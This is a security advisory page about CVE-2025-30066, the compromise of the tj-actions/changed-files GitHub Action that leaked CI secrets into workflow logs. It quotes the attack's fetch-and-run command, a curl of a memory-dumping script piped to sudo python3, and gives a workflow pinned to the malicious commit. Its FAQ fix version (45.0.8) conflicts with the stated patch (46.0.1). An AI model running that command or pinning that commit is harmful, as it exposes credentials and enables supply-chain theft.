CVE-2025-30066: tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability

Published Mar 15, 2025
·
Updated

Summary A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.

This has been patched in v46.0.1.

Details The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.

Key Indicators of Compromise (IoC): - Malicious commit: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - Retroactively updated tags pointing to the malicious commit: - v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67 - v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67

Malicious Code Execution: The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs: B64BLOB=curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3

This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.

Proof of Concept (PoC) Steps to Reproduce: 1. Create a GitHub Actions workflow using the tj-actions/changed-files action:

yml name: "tj-action changed-files incident" on: pullrequest: branches: - main jobs: changedfiles: runs-on: ubuntu-latest steps: - name: Get changed files id: changed-files uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67 2. Run the workflow and inspect the logs in the Actions tab. 3. Vulnerable workflows may display secrets in the logs.

Detection: Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to: - gist.githubusercontent.com

Live reproduction logs: 🔗 Harden-Runner Insights

This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com.

Duration of Vulnerability The vulnerability was active between March 14 and March 15, 2025.

Action Required 1. Review your workflows executed between March 14 and March 15: - Check the changed-files section for unexpected output. - Decode suspicious output using the following command: echo 'xxx' | base64 -d | base64 -d - If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.

2. Update workflows referencing the compromised commit: - If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.

3. Tagged versions: - If you are using tagged versions (e.g., v35, v44.5.1), no action is required as these tags have been updated and are now safe to use.

4. Rotate potentially exposed secrets: - As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.

Impact - Type of vulnerability: Supply chain attack, Secrets exposure, Information leakage - Who is impacted: - Over 23,000 repositories using tj-actions/changed-files. - Organizations with public repositories are at the highest risk, as their logs may already be compromised. - Potential consequences: - Theft of CI/CD secrets (API keys, cloud credentials, SSH keys). - Unauthorized access to source code, infrastructure, and production environments. - Credential leaks in public repositories, enabling further supply chain attacks.

Other sources

tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs. (The tags v1 through v45.0.7 were affected on 2025-03-14 and 2025-03-15 because they were modified by a threat actor to point at commit 0e58ed8, which contained malicious updateFeatures code.)

MITRE

tj-actions/changed-files GitHub Action contains an embedded malicious code vulnerability that allows a remote attacker to discover secrets by reading Github Actions Workflow Logs. These secrets may include, but are not limited to, valid AWS access keys, GitHub personal access tokens (PATs), npm tokens, and private RSA keys.

CISA

Affected Software

4 affected componentsFixes available
actions/tj-actions/changed-files<=45.0.7
46.0.1
tj-actions changed-files<=45.0.7
tj-actions changed-files GitHub Action
tj-actions changed-files<=45.0.7

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade actions/tj-actions/changed-files to a version that resolves this vulnerability.

    Fixed in 46.0.1
  2. Upgrade

    Upgrade tj-actions/changed-files to a version that resolves this vulnerability.

    Fixed in v46.0.1
  3. Operational

    Rotate any potentially exposed CI/CD secrets that may have been leaked to GitHub Actions logs during March 14–March 15, 2025 (e.g., AWS access keys, GitHub PATs, npm tokens, private RSA keys).

  4. Operational

    Inspect GitHub Actions logs for unexpected output from the 'changed-files' step and revoke/rotate any sensitive information found.

Event History

Mar 15, 2025
CVE Published
via MITRE·12:00 AM
Data Sourced
via MITRE·12:00 AM
DescriptionSeverityWeakness
Data Sourced
via NVD·06:15 AM
DescriptionSeverityWeaknessAffected Software
Advisory Published
via GitHub·06:30 AM
Mar 17, 2025
News Published
via The Register·12:34 PM
News Published
via The Register·12:38 PM
News Published
via BleepingComputer·03:24 PM
News Published
via BleepingComputer·03:25 PM
Mar 18, 2025
Known Exploited
via CISA·12:00 AM
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2025-30066?

The severity of CVE-2025-30066 is high due to its potential to expose sensitive information through action logs.

2

How do I fix CVE-2025-30066?

To fix CVE-2025-30066, upgrade tj-actions changed-files to version 45.0.8 or later.

3

Who is affected by CVE-2025-30066?

CVE-2025-30066 affects users of tj-actions changed-files version 45.0.7 and earlier.

4

What type of vulnerability is CVE-2025-30066?

CVE-2025-30066 is a security vulnerability that allows remote attackers to discover secrets via actions logs.

5

What actions should users take regarding CVE-2025-30066?

Users should review their actions logs for potential exposure of sensitive information and upgrade their tj-actions changed-files installation.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203